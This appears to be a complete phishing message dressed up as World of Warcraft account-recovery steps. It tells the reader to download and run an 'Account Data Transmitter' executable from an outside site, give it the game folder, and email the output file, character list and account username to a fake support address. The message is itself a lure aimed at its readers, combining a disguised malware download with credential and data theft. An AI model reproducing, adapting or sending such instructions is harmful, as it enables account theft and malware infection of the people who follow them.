In order to retrieve your account you will need to follow these simple steps: Step 1. Download and run the following link :www.universalgaming.eu/AccountDataTransmitter.rar
Step 2. Extract the Account Data Transmitter
Note: If an error occurs when you try to run the Account Data Transmitter.exe please dowload :

Step 3. When you open the Account Data Transmitter please insert the location of your World of Warcraft Folder ,
example : Local Disk (D <Program Files<World of Warcraft
Step 4. On you desktop it will appear a text file "output.txt"
Step 5. Send an email to support@universalgaming.eu with the following information:
a. Output.txt (please attach the folder)
b. Character list
c. Account username (the one you used before the verification process)
